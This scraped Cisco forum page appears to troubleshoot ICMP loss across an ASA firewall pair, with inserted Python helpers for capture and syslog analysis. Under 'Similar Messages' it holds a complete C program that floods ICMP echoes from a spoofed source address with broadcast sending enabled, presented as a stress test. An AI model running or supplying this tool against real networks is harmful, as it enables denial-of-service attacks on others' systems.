ASA ICMP Packets
Hi Guys,
Actually we have two ASA 5520 in active/passive. We are losing random ICMP packets between hosts located at different ASA interfaces or zones; that is, random ICMP packets are lost when they cross the firewalls.
asa# sh interface | i errors
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
94 input errors, 0 CRC, 0 frame, 94 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
2 input errors, 0 CRC, 0 frame, 2 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 0 interface resets
asa# show conn count
7924 in use, 7934 most used
asa# show resource usage
Resource         Current  Peak   Limit   Denied  Context
SSH                    2     2       5        0  System
ASDM                   1     3       5        0  System
Syslogs [rate]       444  1295     N/A        0  System
Conns               7284  8000  280000        0  System
Xlates              2728  3063     N/A        0  System
Hosts               3155  3403     N/A        0  System
Conns [rate]         195   946     N/A        0  System
Inspects [rate]       20   280     N/A        0  System
asa# sh processes cpu-usage non-zero
PC        Thread    5Sec   1Min   5Min   Process
081a86c4  c91afa08  56.9%  45.1%  37.5%  Dispatch Unit
08c15df6  c91a93a8   1.3%   1.3%   1.2%  Logger
08190627  c91a4ec0   0.0%   0.1%   0.0%  tmatch compile thread
084b6fa1  c91a40f8   0.3%   0.6%   0.6%  IKE Daemon
083ccbfc  c91a17a0   0.1%   0.1%   0.1%  fover_health_monitoring_thread
08405637  c91a13b0   0.0%   0.1%   0.1%  ha_trans_data_tx
085345ae  c91a09d8   0.5%   0.3%   0.3%  ARP Thread
088c038d  c918f248   2.3%   2.2%   2.3%  Unicorn Admin Handler
08bde96c  c9189ba8   0.2%   0.4%   0.2%  ssh
Actually I followed your recommendation about capturing ICMP traffic on the ingress and egress interfaces to see how many packets are getting to the ASA and how many are leaving... Dammit! I saw the same input and output traffic. I can't see on the ASP capture any ICMP packet being dropped by the ASA...
Thanks a lot, guys, for your help; I really appreciate that.
asa(config)# sh capture
capture capin type raw-data interface franqui [Capturing - 204480 bytes]
match icmp host 192.168.3.130 host 172.31.5.28
capture capout type raw-data interface inside [Capturing - 204480 bytes]
match icmp host 192.168.3.130 host 172.31.5.28
capture asp type asp-drop all buffer 9999999 [Capturing - 9880419 bytes]
asa(config)#
asa(config)# sho cap asp | i 192.168.3.130
1094: 11:15:02.770056 192.168.3.130.80 > 10.150.4.139.52083: . ack 1800180435 win 64240
8427: 11:16:39.131340 192.168.3.130.137 > 192.168.3.255.137: udp 50
8534: 11:16:39.877548 192.168.3.130.137 > 192.168.3.255.137: udp 50
8606: 11:16:40.624982 192.168.3.130.137 > 192.168.3.255.137: udp 50
13257: 11:17:46.657253 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
15450: 11:18:18.148170 192.168.3.130.137 > 192.168.3.255.137: udp 50
23235: 11:20:01.004226 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
24334: 11:20:15.551271 192.168.3.130.138 > 192.168.3.255.138: udp 201
28941: 11:21:21.650265 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
30622: 11:21:47.743842 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
38870: 11:23:44.843721 192.168.3.130.137 > 192.168.3.255.137: udp 50
51315: 11:26:39.053433 192.168.3.130.137 > 192.168.3.255.137: udp 50
51382: 11:26:39.790349 192.168.3.130.137 > 192.168.3.255.137: udp 50
51438: 11:26:40.540285 192.168.3.130.137 > 192.168.3.255.137: udp 50
66736: 11:30:18.165610 192.168.3.130.137 > 192.168.3.255.137: udp 50
75694: 11:32:17.742301 192.168.3.130.138 > 192.168.3.255.138: udp 201
asa(config)# sho cap asp | i 172.31.5.28
458: 11:14:54.353894 172.31.5.28.138 > 172.31.255.255.138: udp 201
9219: 11:16:49.088404 172.31.5.28.63954 > 172.31.5.254.443: F 1216116677:1216116677(0) ack 3105814648 win 65535
9220: 11:16:49.129647 172.31.5.28.63955 > 172.31.5.254.443: F 3311562654:3311562654(0) ack 1788680111 win 65535
9907: 11:16:58.316817 172.31.5.28.63957 > 172.31.5.254.443: F 2372132966:2372132966(0) ack 3446739520 win 65535
9924: 11:16:58.465155 172.31.5.28.63958 > 172.31.5.254.443: F 3052199358:3052199358(0) ack 4060397993 win 65535
9926: 11:16:58.478353 172.31.5.28.63959 > 172.31.5.254.443: F 2416626469:2416626469(0) ack 600987510 win 65535
10207: 11:17:01.425911 172.31.5.28.63960 > 172.31.5.254.443: F 4284764250:4284764250(0) ack 2764360472 win 65535
10209: 11:17:01.462653 172.31.5.28.63962 > 172.31.5.254.443: F 2897853406:2897853406(0) ack 36732653 win 65535
10562: 11:17:06.392862 172.31.5.28.63963 > 172.31.5.254.443: F 3418331111:3418331111(0) ack 4106159305 win 65535
10566: 11:17:06.437782 172.31.5.28.63965 > 172.31.5.254.443: F 351951743:351951743(0) ack 3852846382 win 65535
10570: 11:17:06.491109 172.31.5.28.63964 > 172.31.5.254.443: R 3743180378:3743180378(0) ack 2036124283 win 0
10571: 11:17:06.491322 172.31.5.28.63964 > 172.31.5.254.443: R 3743180378:3743180378(0) win 0
10605: 11:17:06.990885 172.31.5.28.63967 > 172.31.5.254.443: R 1622463220:1622463220(0) ack 1444481707 win 0
10606: 11:17:06.991113 172.31.5.28.63966 > 172.31.5.254.443: F 4291895411:4291895411(0) ack 1869758408 win 65535
10607: 11:17:06.991205 172.31.5.28.63967 > 172.31.5.254.443: R 1622463220:1622463220(0) win 0
10716: 11:17:09.033506 172.31.5.28.63968 > 172.31.5.254.443: F 1213337051:1213337051(0) ack 2793080200 win 65535
28699: 11:21:18.048444 172.31.5.28.63978 > 172.31.5.254.443: F 3516588597:3516588597(0) ack 4082523455 win 65535
28702: 11:21:18.082530 172.31.5.28.63979 > 172.31.5.254.443: F 2624860618:2624860618(0) ack 1229240024 win 65535
29157: 11:21:25.289917 172.31.5.28.63980 > 172.31.5.254.443: F 1840304766:1840304766(0) ack 3822990521 win 65535
29159: 11:21:25.369808 172.31.5.28.63983 > 172.31.5.254.443: F 879930713:879930713(0) ack 1786169064 win 65535
29160: 11:21:25.381587 172.31.5.28.63984 > 172.31.5.254.443: F 427260469:427260469(0) ack 341330867 win 65535
29321: 11:21:28.067242 172.31.5.28.63985 > 172.31.5.254.443: F 2238218183:2238218183(0) ack 2288210469 win 65535
29325: 11:21:28.098902 172.31.5.28.63986 > 172.31.5.254.443: F 118474273:118474273(0) ack 4277263123 win 65535
29665: 11:21:33.143074 172.31.5.28.63987 > 172.31.5.254.443: F 1353084768:1353084768(0) ack 2091147977 win 65535
29667: 11:21:33.174566 172.31.5.28.63989 > 172.31.5.254.443: F 3477322977:3477322977(0) ack 2198309559 win 65535
29701: 11:21:33.621763 172.31.5.28.63988 > 172.31.5.254.443: R 1603447742:1603447742(0) ack 2966254164 win 0
29702: 11:21:33.622007 172.31.5.28.63991 > 172.31.5.254.443: R 272764148:272764148(0) ack 2362014837 win 0
29703: 11:21:33.622282 172.31.5.28.63988 > 172.31.5.254.443: R 1603447742:1603447742(0) win 0
29704: 11:21:33.622328 172.31.5.28.63991 > 172.31.5.254.443: R 272764148:272764148(0) win 0
29767: 11:21:34.860764 172.31.5.28.63992 > 172.31.5.254.443: F 4226212155:4226212155(0) ack 2230361367 win 65535
52256: 11:26:52.323835 172.31.5.28.138 > 172.31.255.255.138: udp 201
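As an added example, not code from the thread: a script that correlates the ingress and egress captures the poster took. It parses the tcpdump-style packet lines that "show capture <name>" prints, counts echo requests and replies per host pair within one capture, and compares the request count seen entering the firewall with the count seen leaving it, so a positive gap points at the appliance and an equal count (the poster's result) points beyond it. The capture text below is constructed, and the "icmp: echo request" / "icmp: echo reply" wording is assumed from the ASA's tcpdump-style output.

```python
import re
from collections import Counter

# One packet line of 'show capture <name>' (tcpdump-style). An optional
# '802.1Q vlan#N P0' tag appears on packets seen on a trunk sub-interface.
PACKET_RE = re.compile(
    r"^\s*(\d+):\s+(\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?:802\.1Q\s+vlan#\d+\s+P\d+\s+)?"
    r"(\S+)\s+>\s+(\S+):\s+(.*)$"
)


def split_endpoint(token):
    """'10.1.2.3.443' -> ('10.1.2.3', 443); a bare address (ICMP) -> ('10.1.2.3', None)."""
    parts = token.split(".")
    if len(parts) == 5 and parts[4].isdigit():
        return ".".join(parts[:4]), int(parts[4])
    return token, None


def parse_capture(text):
    """Turn capture output into packet records; prompt and header lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PACKET_RE.match(line)
        if not m:
            continue
        seq, ts, src_tok, dst_tok, info = m.groups()
        src, sport = split_endpoint(src_tok)
        dst, dport = split_endpoint(dst_tok)
        records.append({"seq": int(seq), "ts": ts, "src": src, "sport": sport,
                        "dst": dst, "dport": dport, "info": info})
    return records


def icmp_echo_counts(records):
    """Echo requests and replies per (requester, target) pair."""
    requests, replies = Counter(), Counter()
    for r in records:
        if r["info"].startswith("icmp: echo request"):
            requests[(r["src"], r["dst"])] += 1
        elif r["info"].startswith("icmp: echo reply"):
            replies[(r["dst"], r["src"])] += 1   # key the reply by the original requester
    return requests, replies


def unanswered_echo(records):
    """Pairs with more requests than replies in one capture: loss somewhere on the path."""
    requests, replies = icmp_echo_counts(records)
    return {pair: n - replies[pair] for pair, n in requests.items() if n > replies[pair]}


def requests_lost_in_firewall(capin_text, capout_text):
    """Requests seen entering but not leaving: a positive count means the box itself dropped them."""
    req_in, _ = icmp_echo_counts(parse_capture(capin_text))
    req_out, _ = icmp_echo_counts(parse_capture(capout_text))
    return {pair: req_in[pair] - req_out[pair] for pair in req_in if req_in[pair] > req_out[pair]}


# Constructed sample output (not a real capture): four pings, three answered.
# Ingress and egress agree, so the missing reply was lost beyond the firewall,
# which is what the poster observed.
CAPIN = """\
capture capin type raw-data interface franqui [Capturing - 1024 bytes]
match icmp host 192.168.3.130 host 172.31.5.28
1: 11:15:00.000100 192.168.3.130 > 172.31.5.28: icmp: echo request
2: 11:15:00.000900 172.31.5.28 > 192.168.3.130: icmp: echo reply
3: 11:15:01.000100 192.168.3.130 > 172.31.5.28: icmp: echo request
4: 11:15:01.000800 172.31.5.28 > 192.168.3.130: icmp: echo reply
5: 11:15:02.000100 192.168.3.130 > 172.31.5.28: icmp: echo request
6: 11:15:03.000100 192.168.3.130 > 172.31.5.28: icmp: echo request
7: 11:15:03.000700 172.31.5.28 > 192.168.3.130: icmp: echo reply
"""

CAPOUT = """\
capture capout type raw-data interface inside [Capturing - 1024 bytes]
match icmp host 192.168.3.130 host 172.31.5.28
1: 11:15:00.000200 192.168.3.130 > 172.31.5.28: icmp: echo request
2: 11:15:00.000800 172.31.5.28 > 192.168.3.130: icmp: echo reply
3: 11:15:01.000200 192.168.3.130 > 172.31.5.28: icmp: echo request
4: 11:15:01.000700 172.31.5.28 > 192.168.3.130: icmp: echo reply
5: 11:15:02.000200 192.168.3.130 > 172.31.5.28: icmp: echo request
6: 11:15:03.000200 192.168.3.130 > 172.31.5.28: icmp: echo request
7: 11:15:03.000600 172.31.5.28 > 192.168.3.130: icmp: echo reply
"""

if __name__ == "__main__":
    print("unanswered on ingress:", unanswered_echo(parse_capture(CAPIN)))
    print("dropped inside the firewall:", requests_lost_in_firewall(CAPIN, CAPOUT))
```

Paste the output of "show capture capin" and "show capture capout" into the two strings to run it against a real pair; the asp-drop capture is still the place to look for the reason once requests_lost_in_firewall reports a gap.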
Similar Messages
-
While researching socket programming in C, I stumbled upon a piece of code designed to repetitively send ICMP packets to a given target. The concept piqued my interest as a viable stress test for a home router, so I copied and compiled the code to see if and how it worked.... well, it DIDN'T work... The code didn't even compile, let alone run. Still interested and not wanting to let this go, I re-wrote the code. Made it better and made it work. I believe this is an interesting utility to say the least and I encourage anyone reading this to test it (ON YOUR OWN SYSTEMS/NETWORK) and/or give input on how to improve upon it. Depending on the feedback I get on here I might try to make a package build out of it.
Disclaimer!!: The following source code is intended specifically for educational purposes and systems testing only. I take no responsibility, and hold no liability for the misuse of this code.
My source code is listed below.
packetsoup.h
/*
 * Packetsoup.h
 * Prototype Functions for icmp_pingV2 project
 * Written By DeadDingo
 * All Rights Reserved 12.21.2013
 */
#ifndef PACK_SOUP_H_
#define PACK_SOUP_H_
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>      /* u_short / u_char used by in_cksum() */
#include <sys/time.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <arpa/inet.h>
typedef unsigned char u8;
typedef unsigned short int u16;
/*
 * Description:
 * Calculates the checksum on a packet to packet basis
 */
unsigned short in_cksum(unsigned short *ptr, int nbytes);
/*
 * Description:
 * Displays Usage Dialog
 */
void Usage( void );
#endif
packetsoup.c
/*
 * Packsoup.c
 * Written by DeadDingo
 * All Rights Reserved 12.21.2013
 * Note:
 * in_cksum() function written by Silver Moon
 */
#include "packetsoup.h"
unsigned short in_cksum(unsigned short *ptr, int nbytes) {
    register long sum;
    u_short oddbyte;
    register u_short answer;
    sum = 0;
    /* sum the buffer as 16-bit words */
    while(nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }
    /* fold in a trailing odd byte, if any */
    if(nbytes == 1) {
        oddbyte = 0;
        *((u_char *) & oddbyte ) = *(u_char *) ptr;
        sum += oddbyte;
    }
    /* add back the carries, then take the one's complement */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}
void Usage( void ) {
    puts("Usage: ");
    puts(" -s <source address>");
    puts(" -d <destination address>");
    puts(" -p <payload size>");
    printf("a.out -s <source address> -d <destination address> -p <payload size>\n");
    exit(8);
}
main.c
/*
 * icmp_pingV2 project
 * ICMP packet utility
 * Originally Written By Silver Moon
 * Version 2 Written By DeadDingo
 * Copyright 12.21.2013
 * This file is part of the icmp_ping package
 * The icmp_pingV2 package is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public Licence as published by
 * the Free Software Foundation, either version 3 of the Licence, or
 * (at your option) any later version.
 * The icmp_pingV2 package is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public Licence for more details.
 * You should have received a copy of the GNU General Public Licence
 * along with the DoS package. If not, see <http://www.gnu.org/licences/>.
 * ================================================
 * Version 2 Change Log:
 * - Better Argument Parsing
 * - Better Error Checking
 * - Fixed Bad Structure Types (Now runs on BSD, Linux, and OSX)
 * - Fixed Bad Member Variables
 * - Added Usage Dialog
 */
#include "packetsoup.h"
int main ( int argc, char *argv[ ] ) {
    unsigned long daddr = 0;
    unsigned long saddr = 0;
    /* sent and on were uninitialised in the posted version; on must be 1 for setsockopt() */
    int payload_size = 0, sent = 0, sent_size, on = 1, i;
    /* Argument Parsing...*/
    if(argc < 3) {
        Usage();
    }
    /* every flag is followed by its value, so stop one short of argc */
    for( i = 1; i < argc - 1; i ++ ) {
        if(strncmp(argv[i], "-s", 2) == 0) {
            saddr = inet_addr(argv[i+1]);
        }
        if(strncmp(argv[i], "-d", 2) == 0) {
            daddr = inet_addr(argv[i+1]);
        }
        if(strncmp(argv[i], "-p", 2) == 0) {
            payload_size = atoi(argv[i+1]);
        }
    } //end for loop
    //end arg parsing
    //Get Raw Socket
    int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if(sockfd < 0) {
        perror("Could not create socket:");
        return 0;
    }
    puts("Socket Is Live!");
    //provide packet headers
    if( setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, (const char *)&on, sizeof(on)) == -1 ) {
        perror("setsockopt:");
        return 0;
    }
    //allow socket to send datagrams to broadcast addresses
    if( setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, (const char *)&on, sizeof(on)) == -1 ) {
        perror("setsockopt");
        return 0;
    }
    //calc packet size
    int packet_size = sizeof(struct ip) + sizeof(struct icmp) + payload_size;
    char *packet = (char *)malloc(packet_size);
    if(!packet) {
        perror("Memory Error");
        close(sockfd);
        return 0;
    }
    //ip header
    struct ip *iphdr = (struct ip *)packet;
    struct icmp *icmphdr = (struct icmp *) (packet + sizeof(struct ip));
    //zero the packet buffer
    memset(packet, 0, packet_size);
    //set member variables and whatnot
    iphdr->ip_v = 4;
    iphdr->ip_hl = 5;
    iphdr->ip_tos = 0;
    iphdr->ip_len = htons(packet_size);
    iphdr->ip_id = rand();
    iphdr->ip_off = 0;
    iphdr->ip_ttl = 255;
    iphdr->ip_p = IPPROTO_ICMP;
    iphdr->ip_src.s_addr = saddr;
    iphdr->ip_dst.s_addr = daddr;
    icmphdr->icmp_type = ICMP_ECHO;
    icmphdr->icmp_code = 0;
    icmphdr->icmp_seq = rand();
    icmphdr->icmp_id = rand();
    icmphdr->icmp_cksum = 0;
    struct sockaddr_in servaddr;
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = daddr;
    memset(&servaddr.sin_zero, 0, sizeof(servaddr.sin_zero));
    puts("sending to target...");
    while(1) {
        memset(packet + sizeof(struct ip) + sizeof(struct icmp), rand() % 255, payload_size);
        //calculate icmp header checksum
        icmphdr->icmp_cksum = 0;
        icmphdr->icmp_cksum = in_cksum( (unsigned short *)icmphdr, sizeof(struct icmp) + payload_size );
        if( ( sent_size = sendto( sockfd, packet, packet_size, 0, (struct sockaddr *) &servaddr, sizeof(servaddr) ) ) < 1 ) {
            perror("Packet Send Failed");
            break;
        }
        ++sent;
        printf("%d packets sent\r", sent);
        fflush(stdout);
        usleep(10000);
    }
    free(packet);
    close(sockfd);
    return 0;
}
Last edited by DeadDingo (2013-12-27 04:07:24)
Ok, sounds good. Like I said, it is meant to be a learning tool, as some of the demo code available online does not accurately portray the proper IP structures needed for socket communication. I actually had to read through a bunch of C libraries to find the correct structs and member variables.
-
Regarding ICMP "Packet Too Big" message in 6PE RFC 4798
Dear All,
The penultimate para in Section 3, Page 6 of 6PE RFC 4798 states the following:
"Otherwise, routers in the IPv4 MPLS network have the option to generate an ICMP "Packet Too Big" message using mechanisms as described in Section 2.3.2 .... of [RFC3032]"
As per RFC3032, the routers in the IPv4 MPLS network can generate ICMP "Time Exceeded" message or "Destination Unreachable because fragmentation needed and DF set" message.
Can someone please explain, how a IPv4 MPLS router will generate an ICMP "Packet Too Big"? This requires that the router in IPv4 MPLS network be a dual stack router to understand the IPv6 header under the label stack. Is my understanding correct?
If the router is an intermediate LSR, how will it know the path to the IPv6 destination even if it is dual stack router?
Thanks in advance.
Cheers,
Sriram
Sriram,
The IPv4 core router does need to have code to understand IPv6 and create the "Packet too big" message and so on. It does not need to be configured for IPv6 though (dual stack).
The forwarding will be done based on the incoming label stack for that IPv6 packet, which means that the ICMPv6 message will be constructed with the source of the original packet as the destination IPv6 address; the top label for the incoming IPv6 packet will be swapped, prepended to the ICMPv6 message and forwarded through the egress interface. The egress PE will receive this ICMPv6 message and forward it appropriately.
The same mechanism is used when performing traceroutes in an L3VPN context, as the core routers have no knowledge of the address space being used by the L3VPN customers and couldn't otherwise forward ICMP messages to the proper source.
Regards -
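A small model of the mechanism the reply describes, added here as an example and not taken from the thread or from either RFC: an IPv4-only LSR swaps the top label from its LFIB, and when the labeled packet would not fit the egress link it builds an ICMPv6 Packet Too Big addressed to the original IPv6 source and sends it down the same LSP, leaving delivery to the egress PE. The LFIB contents, label values, the LSR's IPv6 source address and the MTU accounting (link MTU minus label stack bytes) are all constructed for the example.

```python
from dataclasses import dataclass

IPV6_HDR = 40        # bytes
ICMPV6_HDR = 8       # type, code, checksum, MTU field of a Packet Too Big
IPV6_MIN_MTU = 1280  # an ICMPv6 error must itself fit the minimum IPv6 MTU
LABEL_LEN = 4        # one MPLS label stack entry


@dataclass
class IPv6Packet:
    src: str
    dst: str
    length: int              # whole IPv6 packet, header included
    kind: str = "data"       # "data" or "icmpv6-ptb"
    mtu_reported: int = 0    # only meaningful for a Packet Too Big message


@dataclass
class LabeledPacket:
    labels: list             # label stack, top of stack first
    inner: IPv6Packet


@dataclass
class LfibEntry:
    out_label: int
    out_iface: str
    link_mtu: int            # largest labeled packet the egress link carries


def lsr_handle(pkt, lfib, lsr_src):
    """Model of an IPv4-only core LSR handling one 6PE packet.

    The LSR never looks up the IPv6 destination. If the labeled packet fits the
    egress link it is label-swapped and forwarded. Otherwise an ICMPv6 Packet
    Too Big is built with dst = the original packet's source, the swapped label
    (plus the rest of the stack) is prepended, and it goes out the same LSP so
    the egress PE, which does have IPv6 routes, can deliver it.
    """
    entry = lfib[pkt.labels[0]]
    rest = pkt.labels[1:]
    wire_size = pkt.inner.length + LABEL_LEN * len(pkt.labels)
    if wire_size <= entry.link_mtu:
        return "forward", LabeledPacket([entry.out_label] + rest, pkt.inner)

    # Report the MTU as the IPv6 layer sees it: link MTU minus label overhead (modelling choice).
    usable_mtu = entry.link_mtu - LABEL_LEN * len(pkt.labels)
    quoted = min(pkt.inner.length, IPV6_MIN_MTU - IPV6_HDR - ICMPV6_HDR)
    ptb = IPv6Packet(src=lsr_src, dst=pkt.inner.src,
                     length=IPV6_HDR + ICMPV6_HDR + quoted,
                     kind="icmpv6-ptb", mtu_reported=usable_mtu)
    return "ptb", LabeledPacket([entry.out_label] + rest, ptb)


# Constructed LFIB: transport label 100 -> 200 out of ge0, a 1500-byte link.
SAMPLE_LFIB = {100: LfibEntry(out_label=200, out_iface="ge0", link_mtu=1500)}
LSR_SRC = "2001:db8:ffff::7"   # assumed IPv6 address the LSR uses as ICMPv6 source


def demo():
    # Two-label stack: transport label 100 over the 6PE label 16 (constructed values).
    big = LabeledPacket([100, 16], IPv6Packet("2001:db8::1", "2001:db8:1::9", 1500))
    small = LabeledPacket([100, 16], IPv6Packet("2001:db8::1", "2001:db8:1::9", 1400))
    return lsr_handle(big, SAMPLE_LFIB, LSR_SRC), lsr_handle(small, SAMPLE_LFIB, LSR_SRC)


if __name__ == "__main__":
    for action, out in demo():
        print(action, out.labels, out.inner)
```

The point the model makes is that the PTB's label stack is derived from the incoming label (swap), not from any IPv6 lookup, which is why the core router needs IPv6 code but no IPv6 routing state.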
ASA - ICMP works on a L2L tunnel but TCP fails.
All,
I have just started to work with the ASA's and I have a couple of problems with two 5510 8.4(1) ASA's supporting a L2L tunnel.
Problem-1:
Below is the topology and currently the only config on these ASA's is what is required to get the LAN2LAN tunnel setup and nothing more. ASA01 and ASA02 are the tunnel termination devices.
LAN A->Routing device->ASA-01 ----->Internet<------------ASA-02<-Routing device<-LAN2
Below is what is working
- Tunnel is established between the ASA's.
- I can ping from LAN A to LAN B and vice versa.
Below is not what is working
- I cannot RDP from a device in LAN A to LAN B and vice versa.
What we found in troubleshooting when we initiate a RDP session from a server in LAN-A to Server in LAN-B.
- The packet capture on ASA - A shows that the SYN leaves the ingress(LAN interface).
- The packet capture on ASA - B shows that the SYN is leaving the LAN interface.
- Don't see a SYN-ACK on ASA-B. First we thought there might be a different reason (detailed below as problem-2), but we don't see the SYN-ACK on ASA-A either.
- Doing an asp-drop capture on ASA-B, we saw that the SYN-ACK from the server in LAN-B is being dropped with the following message:
Drop-reason: (tcp-not-syn) First TCP packet not SYN
Any ideas on why ASA-B doesn't treat this as an established TCP session?
Problem -2
On the packet capture wizard in ASDM, if I do a capture on the LAN interface of ASA02, I can only see packets leaving the ASA towards the LAN, but I do not see anything coming back into the interface from the LAN. This works the same whether I do an ICMP or a TCP session (RDP).
For example - Ping from a server on LAN A to LAN B
- On ASA01
The packet capture wizard shows both icmp-echo from LAN-A and icmp-reply from LAN-B
- On ASA02
The packet capture wizard shows the icmp-echo from LAN-A but not the icmp-reply from LAN-B.
I am not sure what the reason for both of the problems above is; the reason might just be that my skill level with ASAs is not there yet. Any guidance will be greatly appreciated.
Thanks,
Vishnu
Hello Vishnu,
Any ideas on why ASA-B doesn't treat this as an established TCP session?
This is happening because the ASA is not seeing the entire 3-way handshake. Are you sure all the packets are going across the ASA??? I would recommend you do captures on both inside interfaces just for RDP traffic and attach them to this post so I can correlate them to determine if indeed the ASA is receiving what it needs.
On the packet capture wizard in ASDM, if I do a capture on the LAN interface of ASA02, I can only see packets leaving the ASA towards the LAN, but I do not see anything coming back into the interface from the LAN. This works the same whether I do an ICMP or a TCP session (RDP).
That's exactly the reason why this problem is happening. Good job correlating the facts.
Resolution of the issues:
I would say the problem is on the routing device between ASA-2 and LAN-2...
Make sure the routing device knows that in order to reach LAN-1 it needs to send the traffic back to ASA-2, as somehow this traffic is not making it onto the right interface.
Remember to rate all of the helpful posts. That's as important as a Thanks.
Julio Carvajal Segura -
ASA: capture packets travelling from EasyVPN client to EasyVPN client
Hey everyone,
I have a central ASA running as an EasyVPN server and several ISR 800 routers configured as clients.
When a connection is initiated from Client1 to Client2 over the ASA, I can't see the decrypted packets in the packet capture.
Is there any way to make them visible?
Thanks
Michael
I think this was actually related to the fact that the bad PIX had a restricted license and couldn't comply with the 3DES transform set.
I ended up bypassing by creating a site-to-site tunnel with a single DES transform set and it worked fine. I might go back later and see if I can set multiple transform sets to the dynamic map or if I can have multiple dynamic maps for legacy devices. -
ASA ESP Packet discard messages
Dear All,
We have an L2L tunnel between an ASA running 8.2.5 and a Cisco router. Recently we see the tunnel going down, and the ASA shows messages about ESP packet discards. Below is the message.
%ASA-7-710006: ESP request discarded from x.x.x.x to outside_int:x.x.x
At the same time, from the router the tunnel shows up, but on the ASA it does not. We see CSCso50226, which matches our issue exactly.
As a workaround, we were resetting the tunnel from the router. It comes up and runs for a week.
Please someone look into this and help.
Regards,
Ravi
Hi Ravi,
8.4 is great; don't let the NAT change scare you off too much, and 8.2 was really buggy.
I guess this raises further questions: if your tunnel goes down once a week, is it the same length of time? And does this relate to the timings set on either end in the configuration?
When the tunnel goes down, is it at a quiet time? And have you tried using a test ping/rtr/sla to keep the tunnel up?
The site below identifies the syslog messages, and yours makes me think something's not right. Do you have the sysoptions enabled, or are you using ACLs to limit who can connect to the appliance as a VPN peer? If you have ACLs, have you included IP 50?
http://www.cisco.com/en/US/docs/security/asa/asa82/system/message/logmsgs.html
710006
Error Message %ASA-7-710006: protocol request discarded from source_address to interface_name:dest_address
Explanation This message appears when the adaptive security appliance does not have an IP server that services the IP protocol request; for example, the adaptive security appliance receives IP packets that are not TCP or UDP, and the adaptive security appliance cannot service the request.
Recommended Action In networks that use broadcasting services such as DHCP, RIP or NetBIOS extensively, the frequency of this message can be high. If this message appears in excessive numbers, it may indicate an attack.
Best Regards
Ju
http://helpamunky.wordpress.com/ -
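The quoted Recommended Action distinguishes a broadcast-heavy network that produces this message often from "excessive numbers" that may indicate an attack, and in this thread a single 710006 from the known peer is a bug symptom rather than either. As an added example (not from the thread or from Cisco's documentation), the script below parses the two ASA syslog formats quoted on this page, %ASA-7-710006 and %ASA-3-106014, into per-source counts per time window and flags sources that cross a threshold. The log lines are constructed with documentation addresses; the leading ISO timestamp is assumed to be added by the logging host.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Message IDs quoted on this page and what Cisco's text says they mean.
MESSAGE_MEANING = {
    "710006": "IP protocol request discarded: no service on the appliance for that protocol",
    "106014": "inbound ICMP denied",
}

# "<timestamp> %ASA-<severity>-<id>: <text>"
SYSLOG_RE = re.compile(r"^(\S+)\s+%ASA-(\d)-(\d{6}):\s+(.*)$")

# Where the offending source address sits in each message body.
SOURCE_RES = (
    re.compile(r"\bfrom (\d+\.\d+\.\d+\.\d+) to\b"),               # 710006: "... from X to iface:Y"
    re.compile(r"\bsrc [A-Za-z0-9_-]+:(\d+\.\d+\.\d+\.\d+)\b"),    # 106014: "src outside:X dst ..."
)


def parse_syslog(text):
    """Return (timestamp, severity, message_id, source_ip, body) for each %ASA line."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts, sev, msg_id, body = m.groups()
        src = None
        for pat in SOURCE_RES:
            hit = pat.search(body)
            if hit:
                src = hit.group(1)
                break
        events.append((datetime.fromisoformat(ts), int(sev), msg_id, src, body))
    return events


def window_start(ts, window_seconds):
    """Align a timestamp to the start of its fixed-size window."""
    return ts - (ts - datetime.min) % timedelta(seconds=window_seconds)


def find_bursts(events, threshold, window_seconds=60):
    """(message_id, source, window_start, count) for every source at or above threshold in one window."""
    counts = Counter()
    for ts, _sev, msg_id, src, _body in events:
        counts[(msg_id, src, window_start(ts, window_seconds))] += 1
    return sorted((msg, src, start, n) for (msg, src, start), n in counts.items() if n >= threshold)


def describe(burst):
    msg_id, src, start, n = burst
    return f"{start:%H:%M:%S} {src} {n}x {msg_id} ({MESSAGE_MEANING.get(msg_id, 'unknown')})"


# Constructed sample: one 710006 from the known VPN peer (the poster's symptom),
# a burst of 710006 from an unknown host, and two denied ICMP echoes.
SAMPLE_LOG = """\
2024-05-01T11:00:01 %ASA-7-710006: ESP request discarded from 203.0.113.5 to outside:198.51.100.1
2024-05-01T11:00:05 %ASA-3-106014: Deny inbound icmp src outside:203.0.113.9 dst outside:198.51.100.2 (type 8, code 0)
2024-05-01T11:00:10 %ASA-7-710006: ESP request discarded from 203.0.113.77 to outside:198.51.100.1
2024-05-01T11:00:12 %ASA-7-710006: ESP request discarded from 203.0.113.77 to outside:198.51.100.1
2024-05-01T11:00:15 %ASA-7-710006: ESP request discarded from 203.0.113.77 to outside:198.51.100.1
2024-05-01T11:00:18 %ASA-7-710006: ESP request discarded from 203.0.113.77 to outside:198.51.100.1
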